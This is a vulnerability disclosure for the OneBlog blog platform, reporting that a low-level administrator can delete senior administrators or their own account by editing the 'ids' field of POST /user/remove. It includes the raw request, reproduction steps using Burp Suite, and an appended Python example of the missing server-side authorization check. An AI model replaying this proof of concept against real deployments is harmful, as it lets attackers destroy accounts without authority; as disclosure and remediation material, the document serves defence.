[Suggested description]
An Insecure Permissions vulnerability exists in OneBlog. Low-level administrators can delete higher-level administrators beyond their authority (including administrators with the highest authority).
[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close

ids=3
(The ids value is client-controllable: any administrator can add, delete, modify and query the data of other administrator users by changing it.)
[Attack Type]
Remote
[Vulnerability details]
Step 1: prepare two test accounts with different privilege levels:
Senior administrator: admin
Low-level administrator: root123
Step 2: log in to the system as root123 and open the user management page.
Step 3: click the delete button to delete the administrator user admin directly.
Delete succeeded!
In addition, Burp Suite can be used to intercept the request and delete any user (including yourself) by modifying the value of ids. This is a logic flaw, because the system's own default rule is that you cannot delete yourself.
Step 1: log in to the admin backend with the root123 account and open user management.
Step 2: with request interception enabled, click the delete button for the user test.
Any user can be deleted by modifying the value of ids. Here, I change the value of ids to the id of the currently logged-in user.
Delete succeeded!
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
<= 2.2.8
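The root cause described in this report is that the server trusts the `ids` form field and never asks whether the logged-in administrator is allowed to delete each target. The following is an added illustration of the missing server-side check, written for this page and not taken from OneBlog's code base: a handler for a bulk remove action that parses `ids`, refuses to delete the acting account (the page states that the system's own default rule forbids deleting yourself), and requires the actor to hold a strictly higher role than every target. The role levels, the `User` record, the in-memory store and the sample accounts (`admin`, `root123`, `test`, with `root123` as id 3 to mirror the `ids=3` request above) are all constructed assumptions.

```python
"""Server-side authorization for a bulk "remove users" action.

Added example, not OneBlog's code. It models the check the reported
/user/remove endpoint lacks: resolve every id, authorize the whole
batch, and only then delete. Roles, users and the store are constructed.
"""
from dataclasses import dataclass

# Assumed privilege ordering; a higher number means more authority.
ROLE_LEVEL = {"editor": 1, "admin": 2, "superadmin": 3}


@dataclass
class User:
    id: int
    name: str
    role: str


class AuthorizationError(Exception):
    """Raised when the acting user may not delete one of the targets."""


def parse_ids(raw: str) -> list[int]:
    """Parse the form field `ids=1,2,3`; reject empty or non-numeric input."""
    parts = [p.strip() for p in raw.split(",") if p.strip()]
    if not parts:
        raise ValueError("ids must not be empty")
    try:
        return [int(p) for p in parts]
    except ValueError:
        raise ValueError("ids must be integers") from None


def authorize_remove(actor: User, targets: list[User]) -> None:
    """Raise AuthorizationError unless `actor` may delete every target.

    Rules used here (assumptions for this example):
      1. An account can never delete itself, even if its own id is in `ids`.
      2. The actor must hold a strictly higher role than each target, so a
         low-level administrator cannot remove an administrator above them.
    """
    for t in targets:
        if t.id == actor.id:
            raise AuthorizationError("cannot delete your own account")
        if ROLE_LEVEL[actor.role] <= ROLE_LEVEL[t.role]:
            raise AuthorizationError(
                f"{actor.name} ({actor.role}) may not delete {t.name} ({t.role})"
            )


def remove_users(store: dict[int, User], actor: User, raw_ids: str) -> list[int]:
    """Handler logic for POST /user/remove.

    Resolves every id against the store, authorizes the complete batch
    before touching anything (so a mixed request with one allowed and one
    forbidden id cannot partially succeed), then deletes. Returns the ids
    actually removed.
    """
    ids = parse_ids(raw_ids)
    targets = []
    for i in ids:
        if i not in store:
            raise LookupError(f"no user with id {i}")
        targets.append(store[i])
    authorize_remove(actor, targets)
    for t in targets:
        del store[t.id]
    return [t.id for t in targets]


def demo_store() -> dict[int, User]:
    """Constructed sample data mirroring the report's accounts."""
    return {
        1: User(1, "admin", "superadmin"),   # senior administrator
        2: User(2, "test", "editor"),        # ordinary account
        3: User(3, "root123", "admin"),      # low-level administrator
    }


if __name__ == "__main__":
    store = demo_store()
    root123 = store[3]
    print("root123 deletes test:", remove_users(store, root123, "2"))
    for attempt in ("1", "3"):  # senior admin, then self
        try:
            remove_users(store, root123, attempt)
        except AuthorizationError as err:
            print(f"ids={attempt} refused: {err}")
```

The check is deliberately all-or-nothing: the batch is authorized in full before any row is deleted, so a request that mixes a permitted id with a forbidden one leaves the store untouched. Whatever role model the application actually uses, the decision has to be made from the server-side session identity and the stored role of each target, never from anything the client sends.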